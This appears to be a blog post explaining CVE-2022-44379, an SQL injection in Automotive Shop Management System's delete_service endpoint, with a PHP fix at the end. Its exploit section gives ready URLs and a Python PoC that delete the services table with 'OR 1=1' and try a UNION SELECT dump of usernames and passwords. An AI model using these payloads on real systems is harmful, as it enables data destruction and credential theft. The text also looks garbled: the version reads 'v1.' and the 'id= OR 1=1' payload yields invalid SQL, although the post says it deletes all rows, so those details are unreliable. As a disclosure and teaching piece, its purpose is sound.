CVE-2022-44379 - Exploiting SQL Injection in Automotive Shop Management System v1.

Automotive Shop Management System (ASMS) v1. is a web-based application used to manage automotive repair shops, handling everything from appointments to inventory. In late 2022, researchers identified a critical vulnerability in ASMS v1., now cataloged as CVE-2022-44379, which allows attackers to perform SQL injection. This post explains the vulnerability, how it can be exploited, and demonstrates it with code examples.

What is SQL Injection?

SQL injection is a common web application vulnerability where an attacker is able to manipulate the SQL statements that an application sends to its database. If user input is not correctly sanitized or parameterized, attackers can modify queries, exposing or even altering data.

Where’s the Vulnerability?

According to the NVD entry and Packet Storm advisory, the issue is in /asms/classes/Master.php, specifically with the delete_service function:

- File: /asms/classes/Master.php

Vulnerable parameter: id in the HTTP GET request to ?f=delete_service

The function expects an ID to indicate which service to delete. If user input isn't sanitized, attackers could inject malicious SQL.

Let’s look at what a typical vulnerable snippet might look like inside Master.php

// Hypothetical vulnerable code!
if($_GET['f'] == 'delete_service'){
    $id = $_GET['id'];
    $query = "DELETE FROM services WHERE id = $id";
    $db->query($query);
}

Here, $id is taken right from the URL and placed into the query without validation. If an attacker sends a crafted URL, their input will be executed by MySQL.

Assume the application is running at http://asms.example.com/. An attacker can craft a URL

http://asms.example.com/asms/classes/Master.php?f=delete_service&id= OR 1=1

The server processes this as

DELETE FROM services WHERE id =  OR 1=1

OR 1=1 always evaluates as true, so all rows in the services table will be deleted.

With error-based or UNION-based techniques, attackers can try to extract data. For example

http://asms.example.com/asms/classes/Master.php?f=delete_service&id= UNION SELECT 1,username,password FROM users--

Depending on how errors are handled or if results are returned, this could dump usernames and passwords.

Here’s a simple Python PoC using requests

import requests

# Target URL
url = "http://asms.example.com/asms/classes/Master.php"

# Malicious payload to delete all services
payload = {"f": "delete_service", "id": " OR 1=1"}

response = requests.get(url, params=payload)
print("Status Code:", response.status_code)
print("Response:", response.text)

Alternatively, to test for data extraction, you can try

payload = {"f": "delete_service", "id": " UNION SELECT 1,username,password FROM users--"}
response = requests.get(url, params=payload)
print(response.text)

*(Note: Don’t attack systems without permission – this is for educational purposes only!)*

Fixing the Vulnerability

Sanitize User Input!

Always use parameterized queries or prepared statements. In PHP with MySQLi

if($_GET['f'] == 'delete_service'){
    $id = intval($_GET['id']); // cast to integer!
    $stmt = $db->prepare("DELETE FROM services WHERE id = ?");
    $stmt->bind_param("i", $id);
    $stmt->execute();
}

References

- NVD - CVE-2022-44379
- Exploit Disclosure on Packet Storm
- What is SQL Injection? (OWASP)

Conclusion

CVE-2022-44379 shows how dangerous simple mistakes in code can be. SQL injection can lead to complete compromise of application data. Always validate input, use parameterized queries, and regularly update your software. If you use Automotive Shop Management System v1., patch or fix your code as soon as possible!

Timeline

Published on: 11/18/2022 18:15:00 UTC
Last modified on: 11/21/2022 01:40:00 UTC